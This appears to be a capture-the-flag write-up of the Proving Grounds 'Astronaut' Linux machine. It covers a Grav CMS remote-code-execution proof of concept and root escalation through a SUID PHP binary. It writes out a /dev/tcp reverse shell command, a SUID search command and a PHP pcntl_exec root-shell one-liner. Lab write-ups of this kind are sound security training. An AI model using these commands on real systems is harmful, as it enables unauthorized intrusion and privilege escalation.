Astronaut

Source: Proving Grounds OS: Linux Community Rating: Intermediate

Enumeration & Reconnaissance

  • I started with autorecon as usual, which revealed two open ports on the target:

    • SSH (22)

    • HTTP (80)

Service Analysis

  • Browsing to the HTTP service led me to a Grav CMS admin interface (grav-admin).

grav-admin
  • I checked the robots.txt file, which listed multiple directories, but after checking them all, they led nowhere.

robots.txt
  • I also discovered a login page for the admin. However, default credentials didn’t work, and I noticed that accounts lock after several failed attempts, so bruteforcing wasn’t an option.

Gaining Initial Access

  • After some research, I found multiple CVEs for Grav. One of which allowed for remote code execution (RCE). I found a PoC and tried it.

  • Initially, my attempts failed when I included a trailing “/” at the end of the target URL. Once I removed the trailing slash, the exploit worked. For instance, while this command:

python cve_2.py -c "sh -i >& /dev/tcp/192.168.45.221/9999 0>&1" -t http://192.168.128.12/grav-admin/

didn’t work, this one did the trick:

python cve_2.py -c "sh -i >& /dev/tcp/192.168.45.221/9999 0>&1" -t http://192.168.128.12/grav-admin

This allowed me to get a reverse shell on the target.

Gaining Access

Privilege Escalation

  • Once I had shell access, I ran linpeas.sh to identify further avenues for privilege escalation.

  • The scan revealed a cron job that executed every minute, running a PHP script. I attempted to inject into this PHP script, but soon realized the file was owned by www-data, meaning the shell remained at the same privilege level.

Cron Job Attempt
  • Continuing my search, I ran to look for SUID binaries:

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
  • This command revealed that PHP itself had the SUID bit set. Checking gtfobins provided me with the code required to exploit this. I then executed the command to escalate privileges to root:

php -r "pcntl_exec('/bin/sh', ['-p']);"
Privilege Escalation

Lessons Learned

  • Exploit Error: A subtle difference in the target URL (with or without a trailing slash) can make or break an exploit.

  • SUID Misconfiguration: Misconfigured SUID permissions on PHP was the way for privilege escalation.

Last updated